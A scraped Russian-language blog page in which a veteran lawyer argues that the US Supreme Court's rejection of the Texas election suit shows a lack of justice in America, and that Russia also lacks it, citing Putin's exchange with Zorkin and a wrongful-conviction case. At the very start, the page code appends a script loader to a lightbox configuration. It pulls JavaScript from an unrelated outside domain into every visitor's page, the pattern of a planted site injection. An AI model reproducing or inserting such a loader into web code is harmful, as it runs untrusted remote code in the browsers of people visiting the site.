, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

США доказали, что правосудия у них не установлено, а как с этим в России?

14 Дек

Одним из обоснований принятия в 1787 году Конституции США было установление https://brightonbeachnews.com/rus/constitution-of-the-usa-russian-text/  правосудия, как вида государственной деятельности, осуществляемой в особом порядке, закреплённым Конституцией и процессуальным законодательством.

Прошло более 230 лет.

Этого времени оказалось недостаточно для того, чтобы в США было правосудие.

Верховный суд США отклонил иск генпрокурора Техаса с требованием признать недействительными результаты президентских выборов в нескольких штатах, где победил Джо Байден.

Не повлияло на решение суда и поддержка иска представителями 17 американских штатов.

Председатель Республиканской партии штата Техас Аллен Уэст выступил с предложением создать Союз штатов, где действительно будут соблюдаться положения Конституции США.

Это фактическое признание неподчинение судей Основному закону свидетельствует о том, что мало иметь Конституцию, которую ободрил народ. Надо ещё позаботиться о создании механизмов, которыми будет обеспечиваться всё то, что в Конституции записано.

А, как с этим в России?

Как практикующий почти 50 лет юрист, на конкретных примерах по уголовным делам постоянно пишу о том, что в стране нет правосудия. Опубликовал более 10 монографий, 100 статей в научных журналах, 825 постов на Эхо Москвы.

Выслал Путину и Медведеву экземпляры книг: «Обращения юриста к Президентам России» и "Правомочен ли Президент РФ обеспечить исполнение требований Конституции РФ и иных законов?»

Получен благодарственный http://forjustice.ru/sample-page  ответ Администрации Президента РФ и Администрации Председателя Правительства РФ.

Но дальше этого ничего не делается.

Недавнее общение Владимира Путина  http://www.kremlin.ru/events/president/news/64647  с Председателем Конституционного Суда Валерием Зорькиным, многое проясняет.

Путин полагает, что «функции — Конституционного Суда и Президента — в чём-то совпадают».

А Зорькин говорит: «Вы гарант Конституции, а мы хранители».

Действительно, Конституционный Суд своими решениями более трёх тысяч раз в год обоснованно говорит гаранту Конституции Владимиру Путину о том, что его назначенцы не подчиняются Основному закону страны.

Но гарант Конституции все эти годы бездействует.

Конституционный Суд говоря о несоответствии действий, бездействия и решений чиновников, даёт оценку работы лиц, взявшихся осуществлять государственную власть, но гарант Конституции Путин, формирующий состав исполнителей государственной власти, на это не реагирует.

Как могут осуществлять правосудие те, чьи действия, бездействия и решения были признаны вышестоящими судами, как не правосудные?

Более 12 судей, в разных инстанциях, признавали законным и обоснованным приговоры по делу Костюхина, дважды осуждая его на 15 лет лишения свободы за деяния, которые он не совершал.

Законности пришлось добиваться более четырёх лет.

Но, когда закон восторжествовали, никто из судий, попиравших Конституцию и законы, не пострадали. Они, облачаясь в мантии, далее вершили своё самовластие.

Конституционный Суд, как «хранитель» Конституции, не раз выносил решения, признавая не соответствующими Основному закону страны, законы, которые подписывал и обнародовал, как Президент Владимир Путин.

Чтобы устранить подобное в будущем, Путин решил наделить Конституционный Суд обязанностью соучаствовать в законотворческой деятельности.

Так он просил Зорькина обратить внимание на то, что Государственная Дума, Совет Федерации принимают законы в развитие новых положений Конституции. «И здесь, конечно, очень важно, чтобы эти федеральные законы, принимаемые Федеральным Собранием, в точности соответствовали и букве, и духу поправок в Конституцию».

На что Зорькин сказал: «Мы реагируем только тогда, когда есть запрос от соответствующих органов государственной власти или от граждан».

Полагаю, что при таком понимании применения Конституции, в России ещё не скоро появятся механизмы, обеспечивающие власть Конституции, которая только и способна умерить сложившееся в стране самовластие.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.